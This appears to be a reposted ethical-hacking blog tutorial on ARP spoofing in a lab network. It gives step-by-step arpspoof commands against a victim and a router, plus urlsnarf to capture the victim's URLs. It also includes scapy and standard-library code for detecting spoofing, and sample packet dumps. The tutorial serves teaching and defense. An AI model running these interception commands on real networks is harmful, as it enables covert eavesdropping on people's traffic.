Ethical.Hacking.2021.10: Performing an ARP Spoofing Attack

Start by running sudo -i to become the root user.

Update the package lists: apt-get update

Install dsniff: apt-get install dsniff

The dsniff package contains several useful tools for intercepting network traffic, such as arpspoof, a tool that executes an ARP spoofing attack.

netdiscover issues ARP queries for all possible IP addresses on the subnetwork, and when a machine on the network responds, it records and displays the machine’s MAC address and IP address.

netdiscover -r 10.10.10.0/24

Once the machines have been found, press CTRL+C to stop the scan.

Next, allow Kali to forward packets.

Enable IP forwarding by setting the IP forwarding flag:

echo 1 > /proc/sys/net/ipv4/ip_forward

Generate multiple fake ARP replies by running the following command:

arpspoof -i eth0 -t <VICTIM_IP>  <ROUTER_IP>

The -t flag specifies the target.

The -i flag specifies the interface.

In the output, 0806 is the type field, indicating that an ARP packet is contained within the Ethernet frame being transmitted.

42 is the total number of bytes in the Ethernet frame.

Also trick the router into believing you’re the victim, so that you can intercept incoming internet traffic on the victim’s behalf:

arpspoof -i eth0 -t <ROUTER_IP> <VICTIM_IP>

Extract the URLs by running the following command in a new terminal (it captures the URLs seen in packets on eth0):

kali@kali:~$ sudo urlsnarf -i eth0


Detecting an ARP spoofing attack (install the packages first):

sudo apt install python3-pip

pip3 install --pre scapy[basic]

Run mousepad in the background: mousepad &

from scapy.all import sniff

# Maps each source MAC address to the first IP address it was seen claiming.
IP_MAC_MAP = {}


def processPacket(packet):
    src_IP = packet['ARP'].psrc
    src_MAC = packet['Ether'].src
    if src_MAC in IP_MAC_MAP:
        if IP_MAC_MAP[src_MAC] != src_IP:
            # This MAC address previously claimed a different IP address.
            old_IP = IP_MAC_MAP[src_MAC]
            message = str(old_IP) + " is pretending to be " + str(src_IP)
            # sniff() prints whatever the prn callback returns.
            return message
    else:
        IP_MAC_MAP[src_MAC] = src_IP


sniff(count=0, filter="arp", store=0, prn=processPacket)
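
An added example, not code from the original page: a variation on the detector above that keys its table by IP address instead of MAC address, and also checks that the Ethernet source matches the ARP sender field. It parses raw 42-byte frames with the standard library so it runs without scapy; the names ArpMonitor, parse_arp and sample_frame and all sample MAC addresses are constructed for illustration.

```python
import struct

ETH_P_ARP = 0x0806  # EtherType that marks an ARP payload (the "0806" field above)

def _mac(b): return ":".join(f"{x:02x}" for x in b)
def _ip(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (eth_src, hwsrc, psrc) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42:                       # 14-byte Ethernet header + 28-byte ARP body
        return None
    _dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    hwtype, ptype, hwlen, plen, _op = struct.unpack("!HHBBH", frame[14:22])
    if etype != ETH_P_ARP or (hwtype, ptype, hwlen, plen) != (1, 0x0800, 6, 4):
        return None
    return _mac(src), _mac(frame[22:28]), _ip(frame[28:32])

class ArpMonitor:
    """Remember the first MAC seen for each IP and report later contradictions."""
    def __init__(self):
        self.ip_to_mac = {}

    def check(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        eth_src, hwsrc, psrc = parsed
        alerts = []
        if eth_src != hwsrc:                  # header and ARP body disagree on the sender
            alerts.append(f"{psrc}: Ethernet src {eth_src} != ARP hwsrc {hwsrc}")
        if psrc == "0.0.0.0":                 # ARP probe, carries no IP claim to record
            return alerts
        known = self.ip_to_mac.setdefault(psrc, hwsrc)
        if known != hwsrc:
            alerts.append(f"{psrc} was at {known}, now claimed by {hwsrc}")
        return alerts

def sample_frame(src_mac, src_ip, dst_mac, dst_ip, op=2):
    """Build a constructed 42-byte ARP frame for offline testing (op 2 = is-at)."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    i = lambda s: bytes(map(int, s.split(".")))
    return (m(dst_mac) + m(src_mac) + struct.pack("!HHHBBH", ETH_P_ARP, 1, 0x0800, 6, 4, op)
            + m(src_mac) + i(src_ip) + m(dst_mac) + i(dst_ip))

# Constructed lab traffic: .1 is the router, .5 the victim, ...:aa a third host.
ROUTER, VICTIM, OTHER = "08:00:27:00:00:01", "08:00:27:00:00:05", "08:00:27:00:00:aa"
if __name__ == "__main__":
    mon = ArpMonitor()
    for f in (sample_frame(ROUTER, "10.10.10.1", VICTIM, "10.10.10.5"),
              sample_frame(OTHER, "10.10.10.1", VICTIM, "10.10.10.5")):
        print(mon.check(f))
```

On a live interface, the raw bytes of each captured frame (for example bytes(packet) inside a scapy callback) can be passed to check().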

My exploration code, which starts listening for ARP packets:

from scapy.all import *

def handelPacket(p):
    # src_IP = p['ARP'].psrc
    # src_MAC = p['Ethernet'].src
    # message=str(src_IP)+"  : "+str(src_MAC)
    # return message
    p.show()


sniff(prn=handelPacket, filter="arp", count=0)

Start the ARP spoofing attack from Linux:

sudo arpspoof -i eth0 -t 10.10.10.5 10.10.10.1

Result:

###[ Ethernet ]### 
  dst       = 08:00:27:49:84:59
  src       = 08:00:27:a6:1f:86
  type      = ARP
###[ ARP ]### 
     hwtype    = 0x1
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = who-has
     hwsrc     = 08:00:27:a6:1f:86
     psrc      = 10.10.10.7
     hwdst     = 00:00:00:00:00:00
     pdst      = 10.10.10.3

###[ Ethernet ]### 
  dst       = 08:00:27:a6:1f:86
  src       = 08:00:27:49:84:59
  type      = ARP
###[ ARP ]### 
     hwtype    = 0x1
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = is-at
     hwsrc     = 08:00:27:49:84:59
     psrc      = 10.10.10.3
     hwdst     = 08:00:27:a6:1f:86
     pdst      = 10.10.10.7
###[ Padding ]### 
        load      = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
 


Reposted from blog.csdn.net/lm19770429/article/details/121752480